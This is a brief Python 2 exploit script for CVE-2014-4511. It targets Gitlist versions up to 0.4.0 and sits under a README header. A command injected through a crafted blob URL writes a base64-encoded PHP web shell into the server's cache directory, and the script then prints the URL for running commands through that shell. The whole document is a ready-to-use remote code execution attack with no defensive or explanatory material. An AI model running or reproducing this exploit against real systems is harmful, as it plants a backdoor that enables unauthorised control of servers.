README.md
Rendering markdown...
from commands import getoutput
import urllib
import sys
"""
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
cve: CVE-2014-4511
"""
url = 'http://192.168.1.126/test.git'
# your gitlist url
path = "/var/www/gitlist/cache"
# path of uploading php shell
print '[!] Using cache location %s' % path
# payload <?php system($_GET['cmd']);?>
payload = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4K"
# sploit; python requests does not like this URL, hence wget is used
# "/blob/master/":your master directory of gitlist
mpath = '/blob/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)
out = getoutput("wget %s" % mpath)
if '200' in out:
print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
print '[-] Failed to drop'
print out